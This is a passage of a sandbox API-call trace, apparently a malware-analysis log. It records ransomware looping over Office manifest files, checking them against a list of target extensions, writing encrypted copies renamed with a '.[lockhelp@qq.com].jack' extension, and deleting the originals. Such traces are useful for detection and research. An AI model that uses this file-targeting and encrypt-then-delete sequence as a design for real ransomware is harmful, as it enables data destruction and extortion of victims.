Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0205.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0205.615] lstrlenW (lpString=".doc") returned 4 [0205.615] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.615] lstrlenW (lpString=".docx") returned 5 [0205.615] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.616] lstrlenW (lpString=".pdf") returned 4 [0205.616] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.616] lstrlenW (lpString=".xls") returned 4 [0205.616] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.616] lstrlenW (lpString=".xlsx") returned 5 [0205.616] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.616] lstrlenW (lpString=".ppt") returned 4 [0205.616] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0205.616] lstrlenW (lpString=".zip") returned 4 [0205.616] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.616] lstrlenW (lpString=".rar") returned 4 [0205.616] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.616] lstrlenW (lpString=".bz2") returned 4 [0205.616] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.616] lstrlenW (lpString=".7z") returned 3 [0205.616] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0205.616] lstrlenW (lpString=".dbf") returned 4 [0205.616] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0205.616] lstrlenW (lpString=".1cd") returned 4 [0205.616] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0205.616] lstrlenW (lpString=".jpg") returned 4 [0205.616] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0205.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0205.616] lstrlenW (lpString=".doc") returned 4 [0205.616] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.616] lstrlenW (lpString=".docx") returned 5 [0205.617] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.617] lstrlenW (lpString=".pdf") returned 4 [0205.617] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.617] lstrlenW (lpString=".xls") returned 4 [0205.617] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.617] lstrlenW (lpString=".xlsx") returned 5 [0205.617] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.617] lstrlenW (lpString=".ppt") returned 4 [0205.617] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0205.617] lstrlenW (lpString=".zip") returned 4 [0205.617] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.617] lstrlenW (lpString=".rar") returned 4 [0205.617] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.617] lstrlenW (lpString=".bz2") returned 4 [0205.617] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.617] lstrlenW (lpString=".7z") returned 3 [0205.617] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0205.617] lstrlenW (lpString=".dbf") returned 4 [0205.617] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0205.617] lstrlenW (lpString=".1cd") returned 4 [0205.617] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0205.617] lstrlenW (lpString=".jpg") returned 4 [0205.617] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.617] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0205.617] lstrlenW (lpString="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 53 [0205.618] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0205.629] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=1261) returned 1 [0205.629] CloseHandle (hObject=0x40c) returned 1 [0205.629] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml")) returned 0x220 [0205.629] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0205.629] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.629] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0205.630] GetLastError () returned 0x0 [0205.630] ReadFile (in: hFile=0x40c, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0205.846] WriteFile (in: hFile=0x438, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0205.848] ReadFile (in: hFile=0x40c, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.848] WriteFile (in: hFile=0x438, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x13e, lpOverlapped=0x0) returned 1 [0205.849] SetEndOfFile (hFile=0x438) returned 1 [0205.849] CloseHandle (hObject=0x438) returned 1 [0205.850] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.850] SetEndOfFile (hFile=0x40c) returned 1 [0205.852] CloseHandle (hObject=0x40c) returned 1 [0205.856] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0205.856] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml")) returned 1 [0205.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0205.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0205.857] lstrlenW (lpString=".doc") returned 4 [0205.857] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.857] lstrlenW (lpString=".docx") returned 5 [0205.857] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.857] lstrlenW (lpString=".pdf") returned 4 [0205.857] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.857] lstrlenW (lpString=".xls") returned 4 [0205.857] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.857] lstrlenW (lpString=".xlsx") returned 5 [0205.857] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.857] lstrlenW (lpString=".ppt") returned 4 [0205.857] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0205.857] lstrlenW (lpString=".zip") returned 4 [0205.857] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.857] lstrlenW (lpString=".rar") returned 4 [0205.857] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.857] lstrlenW (lpString=".bz2") returned 4 [0205.857] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.857] lstrlenW (lpString=".7z") returned 3 [0205.857] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0205.858] lstrlenW (lpString=".dbf") returned 4 [0205.858] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0205.858] lstrlenW (lpString=".1cd") returned 4 [0205.858] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0205.858] lstrlenW (lpString=".jpg") returned 4 [0205.858] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0205.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0205.858] lstrlenW (lpString=".doc") returned 4 [0205.858] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.858] lstrlenW (lpString=".docx") returned 5 [0205.858] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.858] lstrlenW (lpString=".pdf") returned 4 [0205.858] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.858] lstrlenW (lpString=".xls") returned 4 [0205.858] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.861] lstrlenW (lpString=".xlsx") returned 5 [0205.861] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.862] lstrlenW (lpString=".ppt") returned 4 [0205.862] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0205.862] lstrlenW (lpString=".zip") returned 4 [0205.862] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.862] lstrlenW (lpString=".rar") returned 4 [0205.862] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.862] lstrlenW (lpString=".bz2") returned 4 [0205.862] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.862] lstrlenW (lpString=".7z") returned 3 [0205.862] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0205.862] lstrlenW (lpString=".dbf") returned 4 [0205.863] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0205.863] lstrlenW (lpString=".1cd") returned 4 [0205.863] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 104 [0205.863] lstrlenW (lpString=".jpg") returned 4 [0205.863] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.863] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0205.863] lstrlenW (lpString="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 53 [0205.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0205.863] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=1261) returned 1 [0205.863] CloseHandle (hObject=0x40c) returned 1 [0205.864] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml")) returned 0x220 [0205.864] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0205.864] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.864] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0205.864] GetLastError () returned 0x0 [0205.864] ReadFile (in: hFile=0x40c, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0206.191] WriteFile (in: hFile=0x438, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0206.192] ReadFile (in: hFile=0x40c, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0206.192] WriteFile (in: hFile=0x438, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x13e, lpOverlapped=0x0) returned 1 [0206.192] SetEndOfFile (hFile=0x438) returned 1 [0206.192] CloseHandle (hObject=0x438) returned 1 [0206.193] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0206.193] SetEndOfFile (hFile=0x40c) returned 1 [0206.194] CloseHandle (hObject=0x40c) returned 1 [0206.194] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0206.195] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml")) returned 1 [0206.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0206.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0206.195] lstrlenW (lpString=".doc") returned 4 [0206.195] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0206.195] lstrlenW (lpString=".docx") returned 5 [0206.195] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0206.195] lstrlenW (lpString=".pdf") returned 4 [0206.196] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0206.196] lstrlenW (lpString=".xls") returned 4 [0206.196] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0206.196] lstrlenW (lpString=".xlsx") returned 5 [0206.196] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0206.196] lstrlenW (lpString=".ppt") returned 4 [0206.196] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0206.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0206.196] lstrlenW (lpString=".zip") returned 4 [0206.196] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0206.196] lstrlenW (lpString=".rar") returned 4 [0206.196] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0206.196] lstrlenW (lpString=".bz2") returned 4 [0206.196] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0206.196] lstrlenW (lpString=".7z") returned 3 [0206.196] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0206.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0206.196] lstrlenW (lpString=".dbf") returned 4 [0206.196] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0206.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0206.196] lstrlenW (lpString=".1cd") returned 4 [0206.196] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0206.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0206.196] lstrlenW (lpString=".jpg") returned 4 [0206.196] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0206.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0206.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0206.197] lstrlenW (lpString=".doc") returned 4 [0206.197] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0206.197] lstrlenW (lpString=".docx") returned 5 [0206.197] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0206.197] lstrlenW (lpString=".pdf") returned 4 [0206.197] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0206.197] lstrlenW (lpString=".xls") returned 4 [0206.197] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0206.197] lstrlenW (lpString=".xlsx") returned 5 [0206.197] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0206.197] lstrlenW (lpString=".ppt") returned 4 [0206.197] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0206.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0206.197] lstrlenW (lpString=".zip") returned 4 [0206.197] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0206.197] lstrlenW (lpString=".rar") returned 4 [0206.197] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0206.197] lstrlenW (lpString=".bz2") returned 4 [0206.197] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0206.197] lstrlenW (lpString=".7z") returned 3 [0206.197] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0206.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0206.197] lstrlenW (lpString=".dbf") returned 4 [0206.197] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0206.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0206.197] lstrlenW (lpString=".1cd") returned 4 [0206.197] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0206.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 104 [0206.198] lstrlenW (lpString=".jpg") returned 4 [0206.198] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0206.198] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0206.198] lstrlenW (lpString="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 53 [0206.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0206.198] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=1261) returned 1 [0206.198] CloseHandle (hObject=0x40c) returned 1 [0206.198] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml")) returned 0x220 [0206.199] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0206.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0206.199] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0206.199] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0206.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0206.199] GetLastError () returned 0x0 [0206.199] ReadFile (in: hFile=0x40c, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0206.351] WriteFile (in: hFile=0x438, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0207.330] ReadFile (in: hFile=0x40c, lpBuffer=0x4555020, 